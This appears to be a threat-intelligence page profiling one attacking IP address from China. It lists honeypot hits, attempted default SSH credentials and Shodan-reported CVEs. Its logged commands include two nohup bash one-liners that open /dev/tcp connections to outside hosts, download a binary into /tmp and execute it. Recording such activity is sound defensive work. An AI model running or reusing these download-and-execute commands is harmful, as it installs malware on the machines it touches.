TROYANOSYVIRUS
Active ThreatMEDIUM

14.103.250.91

Country of Origin🇨🇳 China
First Detection3/26/2026
Last Activity4/13/2026
ISPChina Telecom Group
🎯
57
Total Attacks
🔌
2
Ports
📡
2
Attack Types
🦠
2
Malware

Geolocation

Country
🇨🇳 China
City
Unknown
ASN
AS4811
ISP
China Telecom Group

Attack Types

ssh_telnet_honeypot
redis_honeypot

Attacked Ports

226379

Associated Malware

27a00e0a1f361de17015...5e09f938d5a90ef3ec9c...

Attempted Credentials

🔐root/123456
1x
🔐root/12345678
1x
🔐root/password
1x

Executed Commands

$nohup bash -c "exec 6<>/dev/tcp/114.215.193.12/60124 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/CRER9BSuaq && chmod +x /tmp/CRER9BSuaq && /tmp/CRER9BSuaq qnZNZM+JUyYTFbOmqzGisr0XDCxVm9BmS3jV1mNRZtiISS4PHb24qzKuqLoTEy5XiM9lSmbJ3mdFYdGKVSwdFrq8tDKrvaUWBCxJitNtSWbW1WK1kis+BJcGri9qCtmUXA5RgU0SsWEs5WlUxFJmfQ==" &1x
$head -c 1458464 > /tmp/WI1fQJc1Kr1x
$cat /bin/echo1x
$nohup bash -c "exec 6<>/dev/tcp/23.249.28.118/60132 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/boDE2NF5a0 && chmod +x /tmp/boDE2NF5a0 && /tmp/boDE2NF5a0 r7wKcXKU+43tBY0OUjFbGoMH8of9hm1zDLLc36kWc2WV4YXxDYMQUjJXAIQD7YX/lXJwDazA160CdGyX/YfjBoQUTTJSFZsG+ofhl254Dqzf3KihW/OZjEal6rAmN3TY2rtUghFzXmrg0NvLx0+XjA==" &1x
$cat /bin/echoQtd#UPX!1x
$>yoA@/;'8ELFP;i21x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
223306
Vulnerabilities
CVE-2023-48795CVE-2007-2768CVE-2023-38408CVE-2008-3844CVE-2023-51767CVE-2025-26465CVE-2023-51385CVE-2021-36368CVE-2021-41617CVE-2024-6387CVE-2016-20012CVE-2025-32728
CPEs
cpe:/a:openbsd:openssh:8.7cpe:/a:oracle:mysql

Risk Assessment

55
/100
LowMediumHighCritical